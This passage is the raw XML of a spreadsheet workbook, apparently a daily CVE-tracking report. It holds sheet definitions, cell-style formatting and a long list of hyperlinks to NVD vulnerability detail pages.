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New Today" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Significant Updates" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Added to KEV" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="KEV - Exploited" sheetId="6" state="visible" r:id="rId6"/>
    <sheet name="Critical &amp; High" sheetId="7" state="visible" r:id="rId7"/>
    <sheet name="Watchlist" sheetId="8" state="visible" r:id="rId8"/>
    <sheet name="Packages (GHSA-OSV)" sheetId="9" state="visible" r:id="rId9"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$T$466</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$410</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$57</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$174</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$274</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$92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5">
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00C00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00E97132"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00000000"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00F2C94C"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00000000"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="008FBC8F"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00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vd.nist.gov/vuln/detail/CVE-2026-101072" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101076" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101077" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102240" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101037" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101038" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82377" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85526" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87799" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82384" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90924" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101354" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12342" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85185" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88804" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19759" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81867" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100752" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101039" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101075" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101108" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101110" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101891" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73640" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86102" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102422" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73642" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101081" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101187" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101260" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101261" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101262" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101263" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101264" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102361" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49994" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82378" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101074" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101860" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12264" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12265" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12268" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12269" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78424" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85134" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86595" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86950" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87741" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88808" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90926" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100371" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48100" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54675" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95104" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96538" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-42002" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101002" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54674" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54708" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54710" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75600" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86530" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87969" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100750" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101007" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101008" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101009" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55157" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101073" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101188" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81375" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101292" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54160" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82383" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91043" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82323" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82380" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88805" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93348" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93355" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102004" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16513" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18413" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18414" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4556" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45562" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82348" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82376" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82379" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82386" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82928" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97335" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55160" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100751" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101878" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102243" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102334" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82375" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101012" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101015" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101066" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101067" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101280" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101281" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102245" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102248" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102249" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12267" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86330" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96326" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101091" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102335" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15952" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52748" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55096" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87114" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90925" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93538" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94286" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97023" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97024" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97685" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100392" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102010" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80357" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101004" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101083" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101910" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82935" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91154" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102247" TargetMode="External" Id="rId153" /><Relationship 